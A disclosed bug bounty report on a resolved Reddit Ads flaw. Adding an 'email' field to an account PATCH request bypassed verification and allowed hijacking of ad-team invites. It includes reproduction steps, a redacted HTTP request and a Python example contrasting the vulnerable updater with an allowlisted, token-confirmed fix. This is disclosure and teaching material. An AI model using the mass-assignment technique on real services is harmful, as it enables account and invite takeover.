
Able to bypass email verification and change email to any other user email

High
Reddit
Submitted None

Team Summary

Official summary from Reddit

The reporter discovered they were able to hijack invites to other ads teams by adding the extra field, email, to a request that would allow them to bypass email verification. By doing so they were able to accept invites to ads teams on behalf of others and assume the role of the invitee with their own account. A snippet of the PoC is included in this summary below.

___

Steps to reproduce

1. Create an account with any email you wish from https://ads.reddit.com
2. Don't verify your email
3. Go to https://ads.reddit.com/account/account_id/inventory-type and set any value to capture the request.
4. Change your email to any arbitrary email.
5. Your email will be "verified" and you will be able to accept invites sent to the target email if that email had an invite to an ads team.

```
PATCH /api/v2.0/accounts/<account_id> HTTP/2
Host: ads-api.reddit.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ads.reddit.com/
Authorization Bearer: ████████
Content-Type: application/json
Origin: https://ads.reddit.com
Content-Length: 101
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Cache-Control: max-age=0
Te: trailers

{"data":{"brand_safety_tier_preference":"EXPANDED", "email":"█████" }}
```

Reported by bisesh
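The root cause described in the summary is a generic account-update endpoint that copies client-supplied fields onto the account, so an `email` key slipped into a PATCH for an unrelated setting replaces the address that invites are matched against. The following is an added example, not Reddit's code and not the reporter's PoC: it models that mass-assignment flaw beside a hardened version that allowlists patchable fields and moves address changes behind a token sent to the new mailbox. The account model, the `PATCHABLE_FIELDS` allowlist, the invite-matching logic and all sample values are constructed for illustration.

```python
"""Mass-assignment on an account PATCH endpoint vs. an allowlisted update.

Constructed example. Models the flaw in the report above: a generic
updater writes every submitted key onto the account, so "email" becomes
client-controlled and invite acceptance (matched on the address) can be
hijacked. The hardened path rejects non-allowlisted keys, requires a
mailbox-confirmed token to change the address, and only honours invites
for verified addresses.
"""
from dataclasses import dataclass
from typing import Optional
import hashlib
import hmac
import secrets

# Hypothetical allowlist of fields this endpoint is allowed to update.
PATCHABLE_FIELDS = {"brand_safety_tier_preference"}


@dataclass
class Account:
    account_id: str
    email: str
    email_verified: bool = False
    brand_safety_tier_preference: str = "STANDARD"
    pending_email: Optional[str] = None
    pending_token_hash: Optional[str] = None


@dataclass
class Invite:
    team: str
    invitee_email: str


class PatchRejected(ValueError):
    """Raised when the PATCH body contains keys this endpoint must not set."""


def patch_account_vulnerable(account: Account, data: dict) -> Account:
    """The flaw: every submitted key is written straight onto the account."""
    for key, value in data.items():
        setattr(account, key, value)
    return account


def accept_invite_vulnerable(account: Account, invite: Invite) -> bool:
    """Assumed vulnerable check: the address alone decides membership."""
    return account.email.lower() == invite.invitee_email.lower()


def patch_account_hardened(account: Account, data: dict) -> Account:
    """Allowlist: unknown or sensitive keys fail the whole request loudly."""
    unknown = set(data) - PATCHABLE_FIELDS
    if unknown:
        raise PatchRejected(f"fields not patchable here: {sorted(unknown)}")
    for key in PATCHABLE_FIELDS & set(data):
        setattr(account, key, data[key])
    return account


def request_email_change(account: Account, new_email: str) -> str:
    """Start an address change; the token goes to the NEW mailbox only.

    Returned here so the example can drive the flow; a real service would
    e-mail it and never include it in the API response.
    """
    token = secrets.token_urlsafe(32)
    account.pending_email = new_email
    account.pending_token_hash = hashlib.sha256(token.encode()).hexdigest()
    return token


def confirm_email_change(account: Account, token: str) -> bool:
    """Apply the pending address only when the mailbox-held token matches."""
    if account.pending_token_hash is None or account.pending_email is None:
        return False
    presented = hashlib.sha256(token.encode()).hexdigest()
    if not hmac.compare_digest(account.pending_token_hash, presented):
        return False
    account.email = account.pending_email
    account.email_verified = True
    account.pending_email = None
    account.pending_token_hash = None
    return True


def accept_invite_hardened(account: Account, invite: Invite) -> bool:
    """Membership requires a verified address, not just a matching string."""
    return (account.email_verified
            and account.email.lower() == invite.invitee_email.lower())


if __name__ == "__main__":
    # Constructed sample: an invite addressed to someone else's mailbox.
    invite = Invite("acme-ads", "victim@example.com")
    body = {"brand_safety_tier_preference": "EXPANDED",
            "email": "victim@example.com"}  # extra key, as in the report
    a = Account("acct-1", "attacker@example.com")
    patch_account_vulnerable(a, body)
    print("vulnerable: invite hijacked ->", accept_invite_vulnerable(a, invite))
    b = Account("acct-2", "attacker@example.com")
    try:
        patch_account_hardened(b, body)
    except PatchRejected as exc:
        print("hardened:", exc)
    print("hardened: invite hijacked ->", accept_invite_hardened(b, invite))
```

The design point is that the allowlist is positive (only named fields are writable) rather than a blocklist of "dangerous" keys, and that `email_verified` is never writable through any client-facing update path; it is set only by `confirm_email_change`, whose token is held by whoever controls the target mailbox.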

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$5000.00

Submitted

Weakness

Improper Access Control - Generic